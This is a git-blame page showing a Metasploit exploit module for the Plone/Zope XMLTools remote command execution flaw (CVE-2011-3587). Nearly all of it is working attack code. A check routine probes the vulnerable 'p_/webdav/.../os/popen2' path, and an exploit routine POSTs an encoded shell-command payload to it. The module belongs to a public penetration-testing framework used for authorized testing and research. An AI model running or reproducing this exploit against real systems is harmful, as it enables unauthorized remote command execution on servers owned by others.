Files
metasploit-gs/modules/exploits/multi/http/plone_popen2.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

87 lines
2.5 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
2012-02-20 19:25:55 -06:00
'Name' => 'Plone and Zope XMLTools Remote Command Execution',
'Description' => %q{
Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
the use of Python modules.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Plone Security Team, original vulnerability discovery
'Nick Miles', # Original exploit
2011-12-29 11:14:15 -06:00
'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module
],
'References' =>
[
['CVE', '2011-3587'],
['OSVDB', '76105'],
2012-10-23 21:02:09 +02:00
['EDB', '18262'],
['URL', 'http://plone.org/products/plone/security/advisories/20110928']
],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
2012-10-08 22:17:11 -05:00
'RequiredCmd' => 'generic telnet perl ruby python',
}
},
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Targets' => [['Automatic',{}]],
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '2011-10-04',
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8080),
OptString.new('URI',[true, "The path to the Plone installation", "/"]),
])
register_autofilter_ports([ 8080 ])
end
def check
2013-01-30 23:23:41 -06:00
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
res = send_request_raw(
{
'uri' => uri
}, 25)
2012-02-20 19:25:55 -06:00
if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)
2014-01-21 14:10:35 -06:00
return Exploit::CheckCode::Appears
end
# patched == zExceptions.NotFound
return Exploit::CheckCode::Safe
end
def exploit
2013-01-30 23:23:41 -06:00
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
send_request_cgi(
{
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'cmd' => payload.encoded,
}
}, 0.5) # short timeout, we don't care about the response
end
end